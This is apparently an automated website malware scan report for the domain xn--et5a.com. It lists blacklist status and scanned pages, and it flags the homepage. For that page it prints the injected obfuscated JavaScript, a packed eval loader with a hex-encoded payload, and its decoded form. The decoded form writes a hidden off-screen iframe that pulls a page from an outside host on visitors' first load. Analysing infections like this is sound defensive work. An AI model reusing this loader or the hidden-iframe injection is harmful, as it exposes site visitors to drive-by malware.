New scan:

Malware Scanner report for xn--et5a.com

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "xn--et5a.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=xn--et5a.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xn--et5a.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://xn--et5a.com/
200 OK
Content-Length: 13802
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i&
... 153 bytes are skipped ...
nabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookien|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393370783b20746f703a202d3239393170783b223e3c696672616d652077696474683d22323022206865696768743d22333022207372633d22687474703a2f2f637373686f737468747470682e69676e6f72656c6973742e636f6d2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}))

Decoded script:


function hDcd(data){var b16_digits='0123456789abcdef';var b16_map=new Array();for(var i=0;i<256;i++){b16_map[b16_digits.charAt(i>>4)+b16_digits.charAt(i&15)]=String.fromCharCode(i)}if(!data.match(/^[a-f0-9]*$/i))return false;if(data.length%2)data='0'+data;var ll=data.length;var result=new Array();var j=0;for(var i=0;i<ll;i+=2){result[j++]=b16_map[data.substr(i,2)]}return result.join('')}if(document.cookie.indexOf('cookien=enabled')==-1){document.write(hDcd('3c646976207374796
... 876 bytes are skipped ...
6c7574653b206c6566743a202d3139393370783b20746f703a202d3239393170783b223e3c696672616d652077696474683d22323022206865696768743d22333022207372633d22687474703a2f2f637373686f737468747470682e69676e6f72656c6973742e636f6d2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'));document.cookie='cookien=enabled'}
<div style="position: absolute; left: -1993px; top: -2991px;"><iframe width="20" height="30" src="http://csshosthttph.ignorelist.com/i.php?go=1"></iframe></div>

Antivirus reports:

AntiVir
HTML/Enchor.A
Avast
JS:Iframe-DV [Trj]
nProtect
JS:Trojan.Script.CO
Emsisoft
JS:Trojan.Script.CO (B)
Microsoft
Trojan:JS/Iframe.AC
MicroWorld-eScan
JS:Trojan.Script.CO
F-Secure
JS:Trojan.Script.CO
VIPRE
Malware.JS.Generic (JS)
Norman
Kryptik.BQS
GData
JS:Trojan.Script.CO
BitDefender
JS:Trojan.Script.CO

http://www.google-analytics.com/urchin.js
200 OK
Content-Length: 22678
Content-Type: text/javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21308
Content-Type: text/javascript
clean
http://xn--et5a.com/1.htm
200 OK
Content-Length: 13779
Content-Type: text/html
clean
http://xn--et5a.com/2.htm
200 OK
Content-Length: 13234
Content-Type: text/html
clean
http://xn--et5a.com/3.htm
200 OK
Content-Length: 13179
Content-Type: text/html
clean
http://xn--et5a.com/4.htm
200 OK
Content-Length: 12976
Content-Type: text/html
clean
http://xn--et5a.com/5.htm
200 OK
Content-Length: 12703
Content-Type: text/html
clean
http://xn--et5a.com/6.htm
200 OK
Content-Length: 13862
Content-Type: text/html
clean
http://xn--et5a.com/7.htm
200 OK
Content-Length: 13045
Content-Type: text/html
clean
http://xn--et5a.com/8.htm
200 OK
Content-Length: 15590
Content-Type: text/html
clean
http://xn--et5a.com/9.htm
200 OK
Content-Length: 13040
Content-Type: text/html
clean
http://xn--et5a.com/10.htm
200 OK
Content-Length: 12747
Content-Type: text/html
clean
http://xn--et5a.com/11.htm
200 OK
Content-Length: 14760
Content-Type: text/html
clean
http://xn--et5a.com/12.htm
200 OK
Content-Length: 12709
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: xn--et5a.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 17:00:30 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 13802
Content-Type: text/html
Last-Modified: Thu, 16 Aug 2007 21:05:48 GMT

...13802 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xn--et5a.com
Referer: http://www.google.com/search?q=xn--et5a.com

Result:
The result is similar to the first query. There are no suspicious redirects found.